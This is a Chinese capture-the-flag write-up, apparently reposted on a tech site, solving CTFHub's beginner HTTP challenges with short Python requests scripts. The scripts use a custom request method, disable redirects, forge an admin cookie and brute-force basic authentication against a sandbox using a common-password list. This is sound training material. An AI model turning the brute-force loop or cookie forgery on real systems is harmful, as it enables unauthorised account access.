IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> ctfhub技能树---http协议 -> 正文阅读

[PHP知识库]ctfhub技能树---http协议

闲来无事,用python写了一下,代码都很简单
ctfhub链接:CTFHub

请求方式

他说要用方法CTFHUB,那就直接自定义个方法就可以了

# #请求方式
import requests

url = 'http://challenge-25a50f993babac1c.sandbox.ctfhub.com:10800/index.html' #改成你的url
res = requests.request('CTFHUB', url)
print(res.text)

详细用法请参考:requests.request方法
在这里插入图片描述

302跳转

我的理解就是他会index.html->index.php->index.html,我们可以直接禁止重定向,就到了index.php就不跳转了,所以可以直接用requests中的allow_redirects=False

# 302跳转
import requests

res = requests.get('http://challenge-ef315930cafffdad.sandbox.ctfhub.com:10800/index.php', allow_redirects=False)#改成你的网址/index.php,然后不让他重定向就可以了
print(res.text)

详细用法请参考:requests重定向
在这里插入图片描述

Cookie

直接F12看他的request headers
在这里插入图片描述
盲猜admin=1就可以了,那直接试一试:

# cookie
import requests

url = 'http://challenge-248159ff10251d08.sandbox.ctfhub.com:10800/'  # 改成你自己的url
cookies = {'admin': '1'}
res = requests.get(url, cookies=cookies)
print(res.text)

详细内容:requests的Cookie
在这里插入图片描述

基础认证

在这里插入图片描述
click就跳转到:
在这里插入图片描述
然后他还给了个密码本:
在这里插入图片描述
但没给用户名啊,只能盲猜admin啊,不行就拉倒。
![在这里插入图片描述](https://img-blog.csdnimg.cn/e1c06e0d4a444493beb3e6e18298104c.png
你看,还给了提示,do u know admin
那直接遍历密码本就可以了

# 基础认证
import requests

url = 'http://challenge-cf5a0467fb24a0ae.sandbox.ctfhub.com:10800/flag.html'#改成你自己的url
pwd_list = []
with open('10_million_password_list_top_100.txt', 'r') as f:
    for pwd in f.readlines():
        # pwd_list.append(line)#别用+=,这样他们就变成很多个字符了,而不是一个个字符串,你可以试一试
        pwd = pwd.strip()  # 因为每个字符串都有\n,所以要去掉
        res = requests.get(url, auth=('admin', pwd))
        if res.status_code == 200:
            print(pwd, res.text)
            break
#输出iloveyou ctfhub{f489a1454de438148d22b46a}
#注意,每次的密码和flag都不一样的!

详细内容:requests基础认证
在这里插入图片描述

响应包源代码

本能地F12,然后flag就在里面??
在这里插入图片描述
啊这,那就画蛇添足吧

# 响应包源代码
import requests

url = 'http://challenge-51d50ef13e470ee2.sandbox.ctfhub.com:10800/'
res = requests.get(url)
print(res.text)

然后在输出里面 ctrl+f查找ctfhub就会找到了。
在这里插入图片描述
当然了,眼神好,也可以找一找,就在body下面一行,不过何必呢?直接F12不香吗?

附上requests官方文档链接:requests官网文档

以上。

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-09-21 00:07:30  更:2022-09-21 00:07:47 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 6:01:40-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码